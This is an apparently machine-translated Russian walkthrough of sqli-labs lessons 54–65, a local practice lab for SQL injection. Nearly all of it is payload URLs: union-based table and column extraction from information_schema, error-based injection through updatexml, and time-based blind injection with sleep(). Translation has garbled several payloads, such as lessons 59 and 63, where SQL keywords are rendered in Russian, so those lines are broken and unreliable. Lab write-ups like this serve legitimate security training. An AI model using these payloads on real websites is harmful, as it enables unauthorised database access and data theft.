Стратегия очистки sqli-labs 54–65 [Проблемы]

Расширенные инъекции

Последний добавлен.

меньше-54

Внедрение символов, но здесь можно ограничить только десятью запросами, более десяти раз случайным образом изменит имя таблицы и имя поля. Другими словами, мы должны запросить все результаты в течение 10 раз, что на самом деле достаточно.

http://127.0.0.1/sql-labs/less-54/index.php?id=-1' union select 1,version(),database()--+

http://127.0.0.1/sql-labs/less-54/index.php?id=-11' union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema='challenges'--+

http://127.0.0.1/sql-labs/less-54/index.php?id=-11' union select 1,group_concat(column_name) ,3 from information_schema.columns where table_name='f4kp5pe0zk'--+

http://127.0.0.1/sql-labs/less-54/index.php?id=-11'  union select 1,2,group_concat(id,0x7e,sessid,0x7e,secret_CEKG,0x7e,tryy) from challenges.f4kp5pe0zk--+

Введите соответствующий secret_CEKG, вы можете успешно пройти через

меньше-55

Количество запросов по-прежнему ограничено.После превышения количества раз имя таблицы и имя поля будут изменены.Предел
составляет 14 раз, и пакет параметров изменился.

http://127.0.0.1/sql-labs/less-55/?id=-1) union select 1,user(),version()--+

Другими словами, данные все еще можно проверить, если закрытие заменено, но запрос ограничен 14 раз.

меньше-56

Просто закрой и поменяй

http://127.0.0.1/sql-labs/less-56/?id=-1') union select 1,user(),version()--+

меньше-57

Это пока закрытый вопрос ... Автор делает вопрос на каждый закрытый: ', ",'),").

http://127.0.0.1/sql-labs/less-57/?id=-1" union select 1,user(),version()--+

Less-58

не распечатывает результаты запроса к базе данных, и совместный запрос здесь недоступен.
Сообщение об ошибке распечатано ниже, вы можете попробовать сообщить об ошибке инъекции.

http://127.0.0.1/sql-labs/less-58/index.php?id=-1' and updatexml(1,concat(0x7e,(select database())),1)--+

Разрешить только 5 запросов, изменить имя через 5 раз

меньше-59

Тем не менее, исходя из предыдущего вопроса, измените закрытие.
http://127.0.0.1/sql-labs/less-59/index.php?id=-1 и updatexml (1, concat (0x7e, (выберите базу данных ())), 1) - +

меньше-60

("$ id"), просто закройте или используйте вставку ошибки

http://127.0.0.1/sql-labs/less-60/index.php?id=-1") and updatexml(1,concat(0x7e,(select database())),1)--+

Менее-61

закрыто:

http://127.0.0.1/sql-labs/less-61/index.php?id=-1')) and  updatexml(1,concat(0x7e,(select database())),1)--+

меньше-62

Ответ об ошибке аннотируется и может быть слепым тестом.

http://127.0.0.1/sqli-labs/Less-62/?id=1') and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+

меньше-63

'Закрытая слепая инъекция
http://127.0.0.1/sql-labs/Less-63/?id=1' и if (ascii (substr (database (), 1,1)) = 99, sleep (5), 1) - +

меньше-64

)) закрытие

http://127.0.0.1/sql-labs/Less-64/?id=1)) and if(ascii(substr(database(),1,1))=99,sleep(5),1)--+

меньше-65

")

http://127.0.0.1/sql-labs/Less-65/?id=1") and if(ascii(substr(database(),1,1))=99,sleep(5),1)--+